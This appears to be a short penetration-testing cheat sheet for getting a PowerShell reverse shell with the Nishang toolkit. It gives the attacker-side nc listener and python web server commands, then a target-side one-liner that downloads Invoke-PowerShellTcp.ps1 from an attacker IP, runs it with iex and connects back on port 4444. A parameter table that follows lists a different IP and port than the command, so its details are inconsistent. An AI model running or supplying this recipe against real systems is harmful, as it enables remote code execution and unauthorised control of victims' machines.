PowerShell - Reverse Shell (2)
Source of ps1 scripts
- sudo git clone https://github.com/samratashok/nishang /opt/nishang
On hacker machine
listener
nc -nvlp 4444
static web server (expose /opt/nishang/Shells)
python3 -m http.server
On target machine
powershell iex (New-Object Net.WebClient).DownloadString('http://11.22.33.44:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 11.22.33.44 -Port 4444
Key | Description |
---|---|
http://10.18.9.175:8000/ | server that deliver script |
-IPAddress 10.18.9.175 | local/hacker machine |
-Port 4443 | local/hacker machine |